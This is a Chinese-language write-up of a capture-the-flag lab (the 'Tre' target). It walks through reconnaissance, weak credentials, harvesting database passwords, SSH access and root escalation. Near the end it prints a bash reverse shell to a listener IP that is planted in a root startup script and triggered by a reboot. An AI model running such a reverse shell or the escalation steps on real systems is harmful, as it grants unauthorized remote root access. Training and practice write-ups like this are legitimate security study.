打靶练习9-tre

01

—

拿到靶机，先扫全端口，然后再根据扫出来的端口单独扫描，扫出来了22，80，8082：

发现80和8082都开了http服务，直接目录扫描一波，发现8082没有出什么结果，80倒是出了：

访问一下adminer.php，发现了Adminer 4.7.7这个信息，搜一搜看看：

找到一个SSRF的CVE-2021-21311，SSRF利用方式多种多样的，不好搞，找了一堆EXP都不好使，再信息收集一波：

nikto -h IP #这个工具我比较少使用，第一次用

扫出来一个system目录，账户密码是admin/admin

登录进去是这么个页面：

试了一下弱密码不行，再对这个system目录进行二次爆破（这个意识要着重培养，不然不好突破边界）：

dirsearch -u http://IP/system/

收获满满，查看config的时候，发现了a.txt里面的数据库密码：

马上拿去试试之前的数据库登录框:

查看user_table发现了用户和密码，结果思维惯性，直接拿这密文去MD5爆破了，但是第二列看着就像密码-0-，拿去试一试SSH登录：

成功突破边界！

提权：

看了sudo -l，发现一个shutdown命令可以，但是这名字应该是重启吧。。。先跑一跑linpeas.sh，试了一下跑出来的CVE，没有成功

找一找具有root命令并且我们可以写权限的文件：

find / -user root -type f -perm -o=rw -ls 2>/dev/null | grep -v "/proc"这个命令的目的是查找所有属于 root 用户的、具有写权限的、并且可以被任何用户执行的文件，但排除 /proc 目录中的内容

发现了check-system文件，看了一下内容：

查看资料：

系统启动时启动的程序由systemd ， 系统和服务管理器控制。systemd是启动时运行的第一个进程。它始终具有进程ID (PID)1。计算机中正在运行的所有其他进程都是由systemd启动的，或者由systemd已经启动的进程启动。

那就有可能，我们需要以sudo命令运行刚刚上面的shutdown命令，在这个check-system文件里面写入反弹shell脚本，这样系统重启的时候，我们就拿到root提权：

vim.tiny /usr/bin/check-system（这里有坑，我用find / -perm -u=s -type f 2>/dev/null这个命令找不到vim.tiny，但是它又是存在的，如果直接用vi编辑check-system文件，那就各种BUG，编辑不了，用vim.tiny就可以）bash -i >& /dev/tcp/10.8.0.98/8787 0>&1;sudo shutdown -r等待命令弹回来

总结

打点还是需要锻炼信息收集能力，不然很难找到突破口，提权也不是就靠linpeash脚本跑就好使，还是需要做大量的信息收集。